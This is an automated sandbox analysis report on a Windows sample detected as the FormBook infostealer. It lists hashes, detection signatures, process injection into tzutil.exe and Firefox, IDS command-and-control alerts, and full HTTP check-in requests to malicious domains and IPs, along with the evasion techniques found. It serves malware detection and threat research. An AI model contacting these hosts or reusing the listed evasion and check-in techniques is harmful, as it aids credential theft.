Windows Analysis Report
0Wu31IhwGO.exe

Overview

General Information

Sample name: 0Wu31IhwGO.exe
renamed because original name is a hash value
Original sample name: e6e77931c83b25ca5e349b0c3a2ae39cab402ecfdde8a8507e10966da107f3b3.exe
Analysis ID: 1588148
MD5: 92af2b53955341af234b93ff7a4de5c6
SHA1: 01b41afef6a77f9710aafe75bc5ef86dc50a3e8b
SHA256: e6e77931c83b25ca5e349b0c3a2ae39cab402ecfdde8a8507e10966da107f3b3
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 0Wu31IhwGO.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\0Wu31IhwGO.exe" MD5: 92AF2B53955341AF234B93FF7A4DE5C6)
    • 0Wu31IhwGO.exe (PID: 8184 cmdline: "C:\Users\user\Desktop\0Wu31IhwGO.exe" MD5: 92AF2B53955341AF234B93FF7A4DE5C6)
      • EPnOHZVVNotZ.exe (PID: 5660 cmdline: "C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 3080 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • EPnOHZVVNotZ.exe (PID: 5420 cmdline: "C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6236 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.0Wu31IhwGO.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.0Wu31IhwGO.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
                No Sigma rule has matched
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-01-10T22:05:23.195867+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49717 | 161.97.142.144 | 80 | TCP
                2025-01-10T22:05:47.835328+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49721 | 107.155.56.30 | 80 | TCP
                2025-01-10T22:06:02.464946+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49725 | 18.139.62.226 | 80 | TCP
                2025-01-10T22:06:23.881170+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49729 | 209.74.77.107 | 80 | TCP
                2025-01-10T22:06:38.397632+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49733 | 154.205.156.26 | 80 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-01-10T22:05:23.195867+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49717 | 161.97.142.144 | 80 | TCP
                2025-01-10T22:05:47.835328+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49721 | 107.155.56.30 | 80 | TCP
                2025-01-10T22:06:02.464946+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49725 | 18.139.62.226 | 80 | TCP
                2025-01-10T22:06:23.881170+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49729 | 209.74.77.107 | 80 | TCP
                2025-01-10T22:06:38.397632+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49733 | 154.205.156.26 | 80 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-01-10T22:05:40.031039+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49718 | 107.155.56.30 | 80 | TCP
                2025-01-10T22:05:42.564699+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49719 | 107.155.56.30 | 80 | TCP
                2025-01-10T22:05:45.117302+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49720 | 107.155.56.30 | 80 | TCP
                2025-01-10T22:05:54.441084+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49722 | 18.139.62.226 | 80 | TCP
                2025-01-10T22:05:56.994740+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49723 | 18.139.62.226 | 80 | TCP
                2025-01-10T22:05:59.836770+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49724 | 18.139.62.226 | 80 | TCP
                2025-01-10T22:06:16.294566+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49726 | 209.74.77.107 | 80 | TCP
                2025-01-10T22:06:18.786010+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49727 | 209.74.77.107 | 80 | TCP
                2025-01-10T22:06:21.321304+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49728 | 209.74.77.107 | 80 | TCP
                2025-01-10T22:06:30.558773+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49730 | 154.205.156.26 | 80 | TCP
                2025-01-10T22:06:33.246935+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49731 | 154.205.156.26 | 80 | TCP
                2025-01-10T22:06:35.902236+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49732 | 154.205.156.26 | 80 | TCP
                2025-01-10T22:06:43.968585+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49734 | 3.33.130.190 | 80 | TCP
                2025-01-10T22:06:46.874309+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49735 | 3.33.130.190 | 80 | TCP

                AV Detection

                Source: http://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jhAvira URL Cloud: Label: malware
                Source: http://www.taxiquynhonnew.click/y49d/Avira URL Cloud: Label: malware
                Source: https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMAvira URL Cloud: Label: malware
                Source: 0Wu31IhwGO.exeReversingLabs: Detection: 73%
                Source: 0Wu31IhwGO.exeVirustotal: Detection: 76%
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 0Wu31IhwGO.exeJoe Sandbox ML: detected
                Source: 0Wu31IhwGO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0Wu31IhwGO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283377608.0000000001648000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EPnOHZVVNotZ.exe, 00000007.00000000.2235052111.00000000008FE000.00000002.00000001.01000000.0000000C.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3282425393.00000000008FE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 0Wu31IhwGO.exe, 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2323749197.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2326573240.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 0Wu31IhwGO.exe, 0Wu31IhwGO.exe, 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2323749197.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2326573240.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283377608.0000000001648000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026AC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_026AC9D0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax8_2_02699F80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h8_2_02D504D0

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49722 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49723 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49734 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49726 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49730 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49718 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49735 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49729 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49729 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49725 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49725 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49717 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49717 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49720 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49731 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49721 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49733 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49721 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49728 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49727 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49719 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49733 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49732 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49724 -> 18.139.62.226:80
                Source: DNS query: www.070001325.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Fri, 10 Jan 2025 21:06:32 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Fri, 10 Jan 2025 21:06:35 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: close
                Source: global trafficHTTP traffic detected: GET /gebt/?gtL8P=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=&FZg8n=jDOt606X1jh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.070001325.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2gcl/?gtL8P=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZfz0RhpRCYzUVnPO/bDdiFFJaWY/Yn51Jw=&FZg8n=jDOt606X1jh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.expancz.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.taxiquynhonnew.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a6qk/?FZg8n=jDOt606X1jh&gtL8P=aEceZcxMCBryYHP5wuuxALE/nyOJEnW8Dq1kpoaXpw1kPmwya2N1uoUJGmxyu00sisqpLeUFyGY8IB1P90PsZd1kcaOBiz2wX9gnM6j3y9U4T6bwB9wKCO8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.learnwithus.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ao44/?gtL8P=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsCuPERXHgu+yiQeotGfVKF054NNq7QkAaEIU=&FZg8n=jDOt606X1jh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jijievo.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.likesharecomment.net
                Source: unknownHTTP traffic detected: POST /2gcl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.expancz.topOrigin: http://www.expancz.topConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 202Cache-Control: max-age=0Referer: http://www.expancz.top/2gcl/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 21:05:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:06:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:06:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:06:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:06:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

                E-Banking Fraud

                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0042C953 NtClose,4_2_0042C953
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392B60 NtClose,LdrInitializeThunk,4_2_01392B60
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01392DF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01392C70
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013935C0 NtCreateMutant,LdrInitializeThunk,4_2_013935C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01394340 NtSetContextThread,4_2_01394340
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01394650 NtSuspendThread,4_2_01394650
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392BA0 NtEnumerateValueKey,4_2_01392BA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392B80 NtQueryInformationFile,4_2_01392B80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392BF0 NtAllocateVirtualMemory,4_2_01392BF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392BE0 NtQueryValueKey,4_2_01392BE0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392AB0 NtWaitForSingleObject,4_2_01392AB0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392AF0 NtWriteFile,4_2_01392AF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392AD0 NtReadFile,4_2_01392AD0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392D30 NtUnmapViewOfSection,4_2_01392D30
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392D10 NtMapViewOfSection,4_2_01392D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392D00 NtSetInformationFile,4_2_01392D00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392DB0 NtEnumerateKey,4_2_01392DB0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392DD0 NtDelayExecution,4_2_01392DD0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392C00 NtQueryInformationProcess,4_2_01392C00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392C60 NtCreateKey,4_2_01392C60
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392CA0 NtQueryInformationToken,4_2_01392CA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392CF0 NtOpenProcess,4_2_01392CF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392CC0 NtQueryVirtualMemory,4_2_01392CC0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392F30 NtCreateSection,4_2_01392F30
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392F60 NtCreateProcessEx,4_2_01392F60
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392FB0 NtResumeThread,4_2_01392FB0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392FA0 NtQuerySection,4_2_01392FA0
